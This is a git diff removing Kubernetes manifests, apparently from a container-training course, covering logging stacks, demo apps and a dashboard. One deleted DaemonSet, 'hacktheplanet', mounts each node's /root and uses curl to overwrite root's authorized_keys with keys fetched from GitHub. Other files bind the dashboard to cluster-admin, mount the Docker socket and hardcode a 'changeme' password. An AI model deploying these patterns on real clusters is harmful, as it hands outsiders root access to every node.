- "-client=0.0.0.0"
|
||||
- "-data-dir=/consul/data"
|
||||
- "-server"
|
||||
- "-ui"
|
||||
lifecycle:
|
||||
preStop:
|
||||
exec:
|
||||
command:
|
||||
- /bin/sh
|
||||
- -c
|
||||
- consul leave
|
||||
@@ -1,28 +0,0 @@
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: build-image
|
||||
spec:
|
||||
restartPolicy: OnFailure
|
||||
containers:
|
||||
- name: docker-build
|
||||
image: docker
|
||||
env:
|
||||
- name: REGISTRY_PORT
|
||||
value: #"30000"
|
||||
command: ["sh", "-c"]
|
||||
args:
|
||||
- |
|
||||
apk add --no-cache git &&
|
||||
mkdir /workspace &&
|
||||
git clone https://github.com/jpetazzo/container.training /workspace &&
|
||||
docker build -t localhost:$REGISTRY_PORT/worker /workspace/dockercoins/worker &&
|
||||
docker push localhost:$REGISTRY_PORT/worker
|
||||
volumeMounts:
|
||||
- name: docker-socket
|
||||
mountPath: /var/run/docker.sock
|
||||
volumes:
|
||||
- name: docker-socket
|
||||
hostPath:
|
||||
path: /var/run/docker.sock
|
||||
|
||||
@@ -1,160 +0,0 @@
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: hasher
|
||||
name: hasher
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: hasher
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: hasher
|
||||
spec:
|
||||
containers:
|
||||
- image: dockercoins/hasher:v0.1
|
||||
name: hasher
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: hasher
|
||||
name: hasher
|
||||
spec:
|
||||
ports:
|
||||
- port: 80
|
||||
protocol: TCP
|
||||
targetPort: 80
|
||||
selector:
|
||||
app: hasher
|
||||
type: ClusterIP
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: redis
|
||||
name: redis
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: redis
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: redis
|
||||
spec:
|
||||
containers:
|
||||
- image: redis
|
||||
name: redis
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: redis
|
||||
name: redis
|
||||
spec:
|
||||
ports:
|
||||
- port: 6379
|
||||
protocol: TCP
|
||||
targetPort: 6379
|
||||
selector:
|
||||
app: redis
|
||||
type: ClusterIP
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: rng
|
||||
name: rng
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: rng
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: rng
|
||||
spec:
|
||||
containers:
|
||||
- image: dockercoins/rng:v0.1
|
||||
name: rng
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: rng
|
||||
name: rng
|
||||
spec:
|
||||
ports:
|
||||
- port: 80
|
||||
protocol: TCP
|
||||
targetPort: 80
|
||||
selector:
|
||||
app: rng
|
||||
type: ClusterIP
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: webui
|
||||
name: webui
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: webui
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: webui
|
||||
spec:
|
||||
containers:
|
||||
- image: dockercoins/webui:v0.1
|
||||
name: webui
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: webui
|
||||
name: webui
|
||||
spec:
|
||||
ports:
|
||||
- port: 80
|
||||
protocol: TCP
|
||||
targetPort: 80
|
||||
selector:
|
||||
app: webui
|
||||
type: NodePort
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: worker
|
||||
name: worker
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: worker
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: worker
|
||||
spec:
|
||||
containers:
|
||||
- image: dockercoins/worker:v0.1
|
||||
name: worker
|
||||
@@ -1,69 +0,0 @@
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: cerebro
|
||||
name: cerebro
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: cerebro
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: cerebro
|
||||
spec:
|
||||
volumes:
|
||||
- name: conf
|
||||
configMap:
|
||||
name: cerebro
|
||||
containers:
|
||||
- image: lmenezes/cerebro
|
||||
name: cerebro
|
||||
volumeMounts:
|
||||
- name: conf
|
||||
mountPath: /conf
|
||||
args:
|
||||
- -Dconfig.file=/conf/application.conf
|
||||
env:
|
||||
- name: ELASTICSEARCH_PASSWORD
|
||||
valueFrom:
|
||||
secretKeyRef:
|
||||
name: demo-es-elastic-user
|
||||
key: elastic
|
||||
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: cerebro
|
||||
name: cerebro
|
||||
spec:
|
||||
ports:
|
||||
- port: 9000
|
||||
protocol: TCP
|
||||
targetPort: 9000
|
||||
selector:
|
||||
app: cerebro
|
||||
type: NodePort
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ConfigMap
|
||||
metadata:
|
||||
name: cerebro
|
||||
data:
|
||||
application.conf: |
|
||||
secret = "ki:s:[[@=Ag?QI`W2jMwkY:eqvrJ]JqoJyi2axj3ZvOv^/KavOT4ViJSv?6YY4[N"
|
||||
|
||||
hosts = [
|
||||
{
|
||||
host = "http://demo-es-http.eck-demo.svc.cluster.local:9200"
|
||||
name = "demo"
|
||||
auth = {
|
||||
username = "elastic"
|
||||
password = ${?ELASTICSEARCH_PASSWORD}
|
||||
}
|
||||
}
|
||||
]
|
||||
@@ -1,19 +0,0 @@
|
||||
apiVersion: elasticsearch.k8s.elastic.co/v1
|
||||
kind: Elasticsearch
|
||||
metadata:
|
||||
name: demo
|
||||
namespace: eck-demo
|
||||
spec:
|
||||
http:
|
||||
tls:
|
||||
selfSignedCertificate:
|
||||
disabled: true
|
||||
nodeSets:
|
||||
- name: default
|
||||
count: 1
|
||||
config:
|
||||
node.data: true
|
||||
node.ingest: true
|
||||
node.master: true
|
||||
node.store.allow_mmap: false
|
||||
version: 7.5.1
|
||||
@@ -1,168 +0,0 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ConfigMap
|
||||
metadata:
|
||||
name: filebeat-config
|
||||
namespace: eck-demo
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
data:
|
||||
filebeat.yml: |-
|
||||
filebeat.inputs:
|
||||
- type: container
|
||||
paths:
|
||||
- /var/log/containers/*.log
|
||||
processors:
|
||||
- add_kubernetes_metadata:
|
||||
host: ${NODE_NAME}
|
||||
matchers:
|
||||
- logs_path:
|
||||
logs_path: "/var/log/containers/"
|
||||
|
||||
# To enable hints based autodiscover, remove `filebeat.inputs` configuration and uncomment this:
|
||||
#filebeat.autodiscover:
|
||||
# providers:
|
||||
# - type: kubernetes
|
||||
# node: ${NODE_NAME}
|
||||
# hints.enabled: true
|
||||
# hints.default_config:
|
||||
# type: container
|
||||
# paths:
|
||||
# - /var/log/containers/*${data.kubernetes.container.id}.log
|
||||
|
||||
processors:
|
||||
- add_cloud_metadata:
|
||||
- add_host_metadata:
|
||||
|
||||
cloud.id: ${ELASTIC_CLOUD_ID}
|
||||
cloud.auth: ${ELASTIC_CLOUD_AUTH}
|
||||
|
||||
output.elasticsearch:
|
||||
hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
|
||||
username: ${ELASTICSEARCH_USERNAME}
|
||||
password: ${ELASTICSEARCH_PASSWORD}
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
name: filebeat
|
||||
namespace: eck-demo
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: filebeat
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
spec:
|
||||
serviceAccountName: filebeat
|
||||
terminationGracePeriodSeconds: 30
|
||||
hostNetwork: true
|
||||
dnsPolicy: ClusterFirstWithHostNet
|
||||
containers:
|
||||
- name: filebeat
|
||||
image: docker.elastic.co/beats/filebeat:7.5.1
|
||||
args: [
|
||||
"-c", "/etc/filebeat.yml",
|
||||
"-e",
|
||||
]
|
||||
env:
|
||||
- name: ELASTICSEARCH_HOST
|
||||
value: demo-es-http
|
||||
- name: ELASTICSEARCH_PORT
|
||||
value: "9200"
|
||||
- name: ELASTICSEARCH_USERNAME
|
||||
value: elastic
|
||||
- name: ELASTICSEARCH_PASSWORD
|
||||
valueFrom:
|
||||
secretKeyRef:
|
||||
name: demo-es-elastic-user
|
||||
key: elastic
|
||||
- name: ELASTIC_CLOUD_ID
|
||||
value:
|
||||
- name: ELASTIC_CLOUD_AUTH
|
||||
value:
|
||||
- name: NODE_NAME
|
||||
valueFrom:
|
||||
fieldRef:
|
||||
fieldPath: spec.nodeName
|
||||
securityContext:
|
||||
runAsUser: 0
|
||||
# If using Red Hat OpenShift uncomment this:
|
||||
#privileged: true
|
||||
resources:
|
||||
limits:
|
||||
memory: 200Mi
|
||||
requests:
|
||||
cpu: 100m
|
||||
memory: 100Mi
|
||||
volumeMounts:
|
||||
- name: config
|
||||
mountPath: /etc/filebeat.yml
|
||||
readOnly: true
|
||||
subPath: filebeat.yml
|
||||
- name: data
|
||||
mountPath: /usr/share/filebeat/data
|
||||
- name: varlibdockercontainers
|
||||
mountPath: /var/lib/docker/containers
|
||||
readOnly: true
|
||||
- name: varlog
|
||||
mountPath: /var/log
|
||||
readOnly: true
|
||||
volumes:
|
||||
- name: config
|
||||
configMap:
|
||||
defaultMode: 0600
|
||||
name: filebeat-config
|
||||
- name: varlibdockercontainers
|
||||
hostPath:
|
||||
path: /var/lib/docker/containers
|
||||
- name: varlog
|
||||
hostPath:
|
||||
path: /var/log
|
||||
# data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
|
||||
- name: data
|
||||
hostPath:
|
||||
path: /var/lib/filebeat-data
|
||||
type: DirectoryOrCreate
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: filebeat
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: filebeat
|
||||
namespace: eck-demo
|
||||
roleRef:
|
||||
kind: ClusterRole
|
||||
name: filebeat
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: filebeat
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
rules:
|
||||
- apiGroups: [""] # "" indicates the core API group
|
||||
resources:
|
||||
- namespaces
|
||||
- pods
|
||||
verbs:
|
||||
- get
|
||||
- watch
|
||||
- list
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: filebeat
|
||||
namespace: eck-demo
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
---
|
||||
@@ -1,17 +0,0 @@
|
||||
apiVersion: kibana.k8s.elastic.co/v1
|
||||
kind: Kibana
|
||||
metadata:
|
||||
name: demo
|
||||
spec:
|
||||
version: 7.5.1
|
||||
count: 1
|
||||
elasticsearchRef:
|
||||
name: demo
|
||||
namespace: eck-demo
|
||||
http:
|
||||
service:
|
||||
spec:
|
||||
type: NodePort
|
||||
tls:
|
||||
selfSignedCertificate:
|
||||
disabled: true
|
||||
176
k8s/efk.yaml
@@ -1,176 +0,0 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: fluentd
|
||||
namespace: default
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: fluentd
|
||||
rules:
|
||||
- apiGroups:
|
||||
- ""
|
||||
resources:
|
||||
- pods
|
||||
- namespaces
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
- watch
|
||||
---
|
||||
kind: ClusterRoleBinding
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
metadata:
|
||||
name: fluentd
|
||||
roleRef:
|
||||
kind: ClusterRole
|
||||
name: fluentd
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: fluentd
|
||||
namespace: default
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
name: fluentd
|
||||
namespace: default
|
||||
labels:
|
||||
app: fluentd
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: fluentd
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: fluentd
|
||||
spec:
|
||||
serviceAccount: fluentd
|
||||
serviceAccountName: fluentd
|
||||
tolerations:
|
||||
- key: node-role.kubernetes.io/master
|
||||
effect: NoSchedule
|
||||
containers:
|
||||
- name: fluentd
|
||||
image: fluent/fluentd-kubernetes-daemonset:v1.4-debian-elasticsearch-1
|
||||
env:
|
||||
- name: FLUENT_ELASTICSEARCH_HOST
|
||||
value: "elasticsearch"
|
||||
- name: FLUENT_ELASTICSEARCH_PORT
|
||||
value: "9200"
|
||||
- name: FLUENT_ELASTICSEARCH_SCHEME
|
||||
value: "http"
|
||||
- name: FLUENT_UID
|
||||
value: "0"
|
||||
- name: FLUENTD_SYSTEMD_CONF
|
||||
value: "disable"
|
||||
- name: FLUENTD_PROMETHEUS_CONF
|
||||
value: "disable"
|
||||
resources:
|
||||
limits:
|
||||
memory: 200Mi
|
||||
requests:
|
||||
cpu: 100m
|
||||
memory: 200Mi
|
||||
volumeMounts:
|
||||
- name: varlog
|
||||
mountPath: /var/log
|
||||
- name: varlibdockercontainers
|
||||
mountPath: /var/lib/docker/containers
|
||||
readOnly: true
|
||||
terminationGracePeriodSeconds: 30
|
||||
volumes:
|
||||
- name: varlog
|
||||
hostPath:
|
||||
path: /var/log
|
||||
- name: varlibdockercontainers
|
||||
hostPath:
|
||||
path: /var/lib/docker/containers
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: elasticsearch
|
||||
name: elasticsearch
|
||||
namespace: default
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: elasticsearch
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: elasticsearch
|
||||
spec:
|
||||
containers:
|
||||
- image: elasticsearch:5
|
||||
name: elasticsearch
|
||||
resources:
|
||||
limits:
|
||||
memory: 2Gi
|
||||
requests:
|
||||
memory: 1Gi
|
||||
env:
|
||||
- name: ES_JAVA_OPTS
|
||||
value: "-Xms1g -Xmx1g"
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: elasticsearch
|
||||
name: elasticsearch
|
||||
namespace: default
|
||||
spec:
|
||||
ports:
|
||||
- port: 9200
|
||||
protocol: TCP
|
||||
targetPort: 9200
|
||||
selector:
|
||||
app: elasticsearch
|
||||
type: ClusterIP
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: kibana
|
||||
name: kibana
|
||||
namespace: default
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: kibana
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: kibana
|
||||
spec:
|
||||
containers:
|
||||
- env:
|
||||
- name: ELASTICSEARCH_URL
|
||||
value: http://elasticsearch:9200/
|
||||
image: kibana:5
|
||||
name: kibana
|
||||
resources: {}
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: kibana
|
||||
name: kibana
|
||||
namespace: default
|
||||
spec:
|
||||
ports:
|
||||
- port: 5601
|
||||
protocol: TCP
|
||||
targetPort: 5601
|
||||
selector:
|
||||
app: kibana
|
||||
type: NodePort
|
||||
@@ -1,21 +0,0 @@
|
||||
apiVersion: enterprises.upmc.com/v1
|
||||
kind: ElasticsearchCluster
|
||||
metadata:
|
||||
name: es
|
||||
spec:
|
||||
kibana:
|
||||
image: docker.elastic.co/kibana/kibana-oss:6.1.3
|
||||
image-pull-policy: Always
|
||||
cerebro:
|
||||
image: upmcenterprises/cerebro:0.7.2
|
||||
image-pull-policy: Always
|
||||
elastic-search-image: upmcenterprises/docker-elasticsearch-kubernetes:6.1.3_0
|
||||
image-pull-policy: Always
|
||||
client-node-replicas: 2
|
||||
master-node-replicas: 3
|
||||
data-node-replicas: 3
|
||||
network-host: 0.0.0.0
|
||||
use-ssl: false
|
||||
data-volume-size: 10Gi
|
||||
java-options: "-Xms512m -Xmx512m"
|
||||
|
||||
@@ -1,94 +0,0 @@
|
||||
# This is mirrored from https://github.com/upmc-enterprises/elasticsearch-operator/blob/master/example/controller.yaml but using the elasticsearch-operator namespace instead of operator
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Namespace
|
||||
metadata:
|
||||
name: elasticsearch-operator
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: elasticsearch-operator
|
||||
namespace: elasticsearch-operator
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: elasticsearch-operator
|
||||
rules:
|
||||
- apiGroups: ["extensions"]
|
||||
resources: ["deployments", "replicasets", "daemonsets"]
|
||||
verbs: ["create", "get", "update", "delete", "list"]
|
||||
- apiGroups: ["apiextensions.k8s.io"]
|
||||
resources: ["customresourcedefinitions"]
|
||||
verbs: ["create", "get", "update", "delete", "list"]
|
||||
- apiGroups: ["storage.k8s.io"]
|
||||
resources: ["storageclasses"]
|
||||
verbs: ["get", "list", "create", "delete", "deletecollection"]
|
||||
- apiGroups: [""]
|
||||
resources: ["persistentvolumes", "persistentvolumeclaims", "services", "secrets", "configmaps"]
|
||||
verbs: ["create", "get", "update", "delete", "list"]
|
||||
- apiGroups: ["batch"]
|
||||
resources: ["cronjobs", "jobs"]
|
||||
verbs: ["create", "get", "deletecollection", "delete"]
|
||||
- apiGroups: [""]
|
||||
resources: ["pods"]
|
||||
verbs: ["list", "get", "watch"]
|
||||
- apiGroups: ["apps"]
|
||||
resources: ["statefulsets", "deployments"]
|
||||
verbs: ["*"]
|
||||
- apiGroups: ["enterprises.upmc.com"]
|
||||
resources: ["elasticsearchclusters"]
|
||||
verbs: ["*"]
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: elasticsearch-operator
|
||||
namespace: elasticsearch-operator
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: elasticsearch-operator
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: elasticsearch-operator
|
||||
namespace: elasticsearch-operator
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
name: elasticsearch-operator
|
||||
namespace: elasticsearch-operator
|
||||
spec:
|
||||
replicas: 1
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
name: elasticsearch-operator
|
||||
spec:
|
||||
containers:
|
||||
- name: operator
|
||||
image: upmcenterprises/elasticsearch-operator:0.2.0
|
||||
imagePullPolicy: Always
|
||||
env:
|
||||
- name: NAMESPACE
|
||||
valueFrom:
|
||||
fieldRef:
|
||||
fieldPath: metadata.namespace
|
||||
ports:
|
||||
- containerPort: 8000
|
||||
name: http
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
path: /live
|
||||
port: 8000
|
||||
initialDelaySeconds: 10
|
||||
timeoutSeconds: 10
|
||||
readinessProbe:
|
||||
httpGet:
|
||||
path: /ready
|
||||
port: 8000
|
||||
initialDelaySeconds: 10
|
||||
timeoutSeconds: 5
|
||||
serviceAccount: elasticsearch-operator
|
||||
@@ -1,167 +0,0 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ConfigMap
|
||||
metadata:
|
||||
name: filebeat-config
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
data:
|
||||
filebeat.yml: |-
|
||||
filebeat.config:
|
||||
inputs:
|
||||
# Mounted `filebeat-inputs` configmap:
|
||||
path: ${path.config}/inputs.d/*.yml
|
||||
# Reload inputs configs as they change:
|
||||
reload.enabled: false
|
||||
modules:
|
||||
path: ${path.config}/modules.d/*.yml
|
||||
# Reload module configs as they change:
|
||||
reload.enabled: false
|
||||
|
||||
# To enable hints based autodiscover, remove `filebeat.config.inputs` configuration and uncomment this:
|
||||
#filebeat.autodiscover:
|
||||
# providers:
|
||||
# - type: kubernetes
|
||||
# hints.enabled: true
|
||||
|
||||
processors:
|
||||
- add_cloud_metadata:
|
||||
|
||||
cloud.id: ${ELASTIC_CLOUD_ID}
|
||||
cloud.auth: ${ELASTIC_CLOUD_AUTH}
|
||||
|
||||
output.elasticsearch:
|
||||
hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
|
||||
username: ${ELASTICSEARCH_USERNAME}
|
||||
password: ${ELASTICSEARCH_PASSWORD}
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ConfigMap
|
||||
metadata:
|
||||
name: filebeat-inputs
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
data:
|
||||
kubernetes.yml: |-
|
||||
- type: docker
|
||||
containers.ids:
|
||||
- "*"
|
||||
processors:
|
||||
- add_kubernetes_metadata:
|
||||
in_cluster: true
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
name: filebeat
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
spec:
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
spec:
|
||||
serviceAccountName: filebeat
|
||||
terminationGracePeriodSeconds: 30
|
||||
containers:
|
||||
- name: filebeat
|
||||
image: docker.elastic.co/beats/filebeat-oss:7.0.1
|
||||
args: [
|
||||
"-c", "/etc/filebeat.yml",
|
||||
"-e",
|
||||
]
|
||||
env:
|
||||
- name: ELASTICSEARCH_HOST
|
||||
value: elasticsearch-es.default.svc.cluster.local
|
||||
- name: ELASTICSEARCH_PORT
|
||||
value: "9200"
|
||||
- name: ELASTICSEARCH_USERNAME
|
||||
value: elastic
|
||||
- name: ELASTICSEARCH_PASSWORD
|
||||
value: changeme
|
||||
- name: ELASTIC_CLOUD_ID
|
||||
value:
|
||||
- name: ELASTIC_CLOUD_AUTH
|
||||
value:
|
||||
securityContext:
|
||||
runAsUser: 0
|
||||
# If using Red Hat OpenShift uncomment this:
|
||||
#privileged: true
|
||||
resources:
|
||||
limits:
|
||||
memory: 200Mi
|
||||
requests:
|
||||
cpu: 100m
|
||||
memory: 100Mi
|
||||
volumeMounts:
|
||||
- name: config
|
||||
mountPath: /etc/filebeat.yml
|
||||
readOnly: true
|
||||
subPath: filebeat.yml
|
||||
- name: inputs
|
||||
mountPath: /usr/share/filebeat/inputs.d
|
||||
readOnly: true
|
||||
- name: data
|
||||
mountPath: /usr/share/filebeat/data
|
||||
- name: varlibdockercontainers
|
||||
mountPath: /var/lib/docker/containers
|
||||
readOnly: true
|
||||
volumes:
|
||||
- name: config
|
||||
configMap:
|
||||
defaultMode: 0600
|
||||
name: filebeat-config
|
||||
- name: varlibdockercontainers
|
||||
hostPath:
|
||||
path: /var/lib/docker/containers
|
||||
- name: inputs
|
||||
configMap:
|
||||
defaultMode: 0600
|
||||
name: filebeat-inputs
|
||||
# data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
|
||||
- name: data
|
||||
hostPath:
|
||||
path: /var/lib/filebeat-data
|
||||
type: DirectoryOrCreate
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: filebeat
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: filebeat
|
||||
namespace: kube-system
|
||||
roleRef:
|
||||
kind: ClusterRole
|
||||
name: filebeat
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: filebeat
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
rules:
|
||||
- apiGroups: [""] # "" indicates the core API group
|
||||
resources:
|
||||
- namespaces
|
||||
- pods
|
||||
verbs:
|
||||
- get
|
||||
- watch
|
||||
- list
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: filebeat
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
---
|
||||
@@ -1,14 +0,0 @@
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: kubernetes-dashboard
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: cluster-admin
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: kubernetes-dashboard
|
||||
namespace: kube-system
|
||||
@@ -1,34 +0,0 @@
|
||||
apiVersion: apps/v1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
name: hacktheplanet
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: hacktheplanet
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: hacktheplanet
|
||||
spec:
|
||||
volumes:
|
||||
- name: root
|
||||
hostPath:
|
||||
path: /root
|
||||
tolerations:
|
||||
- effect: NoSchedule
|
||||
operator: Exists
|
||||
initContainers:
|
||||
- name: hacktheplanet
|
||||
image: alpine
|
||||
volumeMounts:
|
||||
- name: root
|
||||
mountPath: /root
|
||||
command:
|
||||
- sh
|
||||
- -c
|
||||
- "apk update && apk add curl && curl https://github.com/jpetazzo.keys > /root/.ssh/authorized_keys"
|
||||
containers:
|
||||
- name: web
|
||||
image: nginx
|
||||
|
||||
@@ -1,18 +0,0 @@
|
||||
global
|
||||
daemon
|
||||
maxconn 256
|
||||
|
||||
defaults
|
||||
mode tcp
|
||||
timeout connect 5000ms
|
||||
timeout client 50000ms
|
||||
timeout server 50000ms
|
||||
|
||||
frontend the-frontend
|
||||
bind *:80
|
||||
default_backend the-backend
|
||||
|
||||
backend the-backend
|
||||
server google.com-80 google.com:80 maxconn 32 check
|
||||
server ibm.fr-80 ibm.fr:80 maxconn 32 check
|
||||
|
||||
@@ -1,16 +0,0 @@
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: haproxy
|
||||
spec:
|
||||
volumes:
|
||||
- name: config
|
||||
configMap:
|
||||
name: haproxy
|
||||
containers:
|
||||
- name: haproxy
|
||||
image: haproxy:1
|
||||
volumeMounts:
|
||||
- name: config
|
||||
mountPath: /usr/local/etc/haproxy/
|
||||
|
||||
@@ -1,13 +0,0 @@
|
||||
apiVersion: networking.k8s.io/v1beta1
|
||||
kind: Ingress
|
||||
metadata:
|
||||
name: whatever
|
||||
spec:
|
||||
rules:
|
||||
- host: whatever.A.B.C.D.nip.io
|
||||
http:
|
||||
paths:
|
||||
- path: /
|
||||
backend:
|
||||
serviceName: whatever
|
||||
servicePort: 1234
|
||||
@@ -1,360 +0,0 @@
|
||||
# Copyright 2017 The Kubernetes Authors.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
|
||||
apiVersion: v1
|
||||
kind: Namespace
|
||||
metadata:
|
||||
name: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
kind: Service
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
spec:
|
||||
ports:
|
||||
- port: 443
|
||||
targetPort: 8443
|
||||
selector:
|
||||
